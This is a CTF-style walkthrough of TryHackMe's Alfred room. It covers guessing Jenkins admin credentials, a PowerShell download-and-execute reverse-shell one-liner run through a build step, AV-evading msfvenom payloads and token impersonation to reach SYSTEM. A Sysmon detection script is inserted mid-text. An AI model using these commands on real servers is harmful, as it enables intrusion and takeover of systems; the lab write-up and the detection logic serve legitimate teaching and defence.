May 8, 2021


Hello everyone, I hope you are doing well. In this post I will be sharing my walkthrough of TryHackMe’s Alfred room. This was an easy Windows machine where you have to log in to the admin portal by guessing the credentials (which was quite simple), then find where you can execute system commands to get a reverse shell, and from there see how you can escalate to SYSTEM.


```
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped syn-ack ttl 127
8080/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```


Here we don’t see anything interesting, so let’s move to the other HTTP port.

PORT 8080 (HTTP)

We can see a Jenkins login portal, so let’s try using the default credentials.


And it didn’t work, so let’s try admin:admin.

This worked and we are in. Now we need to find where we can execute commands so we can get a reverse shell on the target machine.

Hover over the project and you'll get a dropdown menu.

You’ll have options like “Changes”, “Workspace”, “Build Now”, “Delete Project”, “Configure” and “Rename”. Select `Configure`.

Switch to the Build Environment tab.

Here you can see there’s a command written, `whoami`, so let's click on Apply and Save.

Click on #2, then Console Output.

And you can see that whatever command we input there, it will show the output. So what we can do now is host a PowerShell reverse shell script, download it using PowerShell, and execute the function in the script to get a shell.

```
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
```

Start your python3 HTTP server.

And our command will look like this. Start a netcat listener.

Now click on Build Now and that job will run and you'll get a shell
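Detection logic for the download-and-execute command above, as an added example that is not part of the original walkthrough: it scores process-creation events and flags command lines that fetch a remote script and run it in memory. The field names follow Sysmon Event ID 1; the function names, the Jenkins parent process names, the sample events and the 192.0.2.10 address are assumptions made for illustration.

```python
import re

# Assumption: Jenkins runs under java.exe or a jenkins.exe service wrapper.
JENKINS_PARENTS = {"java.exe", "jenkins.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Command-line indicators of fetching a script and running it in memory.
DOWNLOAD = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
EXECUTE = re.compile(r"\biex\b|invoke-expression", re.I)


def exe_name(path):
    return path.rsplit("\\", 1)[-1].lower()  # file name of a Windows image path


def reasons_for(event):
    """List the reasons a process-creation event deserves a look."""
    reasons = []
    if (exe_name(event["ParentImage"]) in JENKINS_PARENTS
            and exe_name(event["Image"]) in SHELLS):
        reasons.append("shell spawned by Jenkins")
    if DOWNLOAD.search(event["CommandLine"]):
        reasons.append("remote download")
    if EXECUTE.search(event["CommandLine"]):
        reasons.append("dynamic execution")
    return reasons


def triage(events, threshold=2):
    """Return (CommandLine, reasons) for events with at least `threshold` reasons."""
    # Jenkins spawning cmd.exe is normal for a build step, so one reason alone is noise.
    scored = [(e["CommandLine"], reasons_for(e)) for e in events]
    return [(cmd, why) for cmd, why in scored if len(why) >= threshold]


# Constructed events using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Java\bin\java.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell iex (New-Object Net.WebClient)"
                    ".DownloadString('http://192.0.2.10:8000/script.ps1')"},
]

if __name__ == "__main__":
    for cmdline, why in triage(SAMPLE_EVENTS):
        print(why, "<-", cmdline)
```

The batch build step runs PowerShell as a child of `cmd.exe`, so the flagged event does not have Jenkins as its direct parent; the command-line indicators carry the detection.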

Generate a msfvenom payload with encoders to bypass AV.

Host it on your local machine and download it by repeating the same method.

Set up your Metasploit listener.

Execute the payload and you’ll see a Meterpreter session pop.

Running the command `getprivs`, we can see what privileges we have on the machine.

Here we can escalate our privileges through SeImpersonatePrivilege.

Run the command `load incognito`; through this module we can impersonate tokens.

Even though we now have SYSTEM on the machine, we still won’t be able to access system files, because the primary token of the process is used and not the impersonated token. So we need to migrate to a process running as SYSTEM, which is services.exe.

Then type `shell` to get a command prompt and navigate to C:\Windows\System32\config to get the root flag.